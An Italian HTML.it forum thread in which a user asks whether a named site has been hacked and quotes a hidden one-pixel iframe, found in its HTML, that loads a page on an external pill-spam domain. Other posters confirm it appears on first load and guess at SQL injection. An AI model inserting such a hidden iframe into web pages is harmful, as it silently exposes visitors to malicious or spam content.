Visualizzazione dei risultati da 1 a 5 su 5

Discussione: Sito hackerato?

Utente di HTML.it L'avatar di ZioJo

Sito hackerato?

Problema sito www.soggiornosalesiano.it
    quando apro il sito appare una pagina bianca, e vedendo nell'HTML vedo questa stringa ma non sempre:
    <iframe width=1 height=1 src='http://blw43x.wanna.somepills.in/images/enter.php?n1'></iframe>
    Cosa diavolo è? Come risolvere il problema, la vedete anche voi?
    Grazie
    Ancora un piccolo sacrificio e saremo punto e daccapo

Moderatore di Sicurezza informatica e virus L'avatar di amvinfe
    ho appena aperto la home del sito e sinceramente non vedo nulla di tutto questo.
    ==
    Visita il mio blog SuspectFile.com
    ==

Utente di HTML.it L'avatar di ZioJo

Riprova, io la vedo di nuovo

Riprova in diversi tempi, a me succede di vedere la pagina bianca con la stringa spam nell'HTML da diversi pc, compare alla prima volta che tento di aprire il sito e poi è tutto regolare, che cos'è?!
    Ancora un piccolo sacrificio e saremo punto e daccapo

Ho fatto la prova anche io, amvinfe ti confermo quanto detto da Ziojo, alla prima apertura nella barra inferiore di internet explorer mi sono comparse le stesse scritte, il sito comunque mi sembra pulito, ho provato ad aprirlo con 2 antivirus diversi attivi e non segnalano nulla, in ogni caso alla seconda prova il sito si è aperto correttamente, se puo' servire a dipanare la matassa, su questo pc ho internet explorer 6.

Utente di HTML.it
    Non sono andato a vederlo, giusto per non prendermi eventuali virus, quindi non so come è strutturato. Abbozzo un'ipotesi: se è un sito dinamico, potrebbe essere stato inserito per esempio sfruttando una sql injection, l'iframe che vedete in qualche voce che non compare sempre, ma a rotazione (per esempio link, pubblicità o cose del genere).

Permessi di invio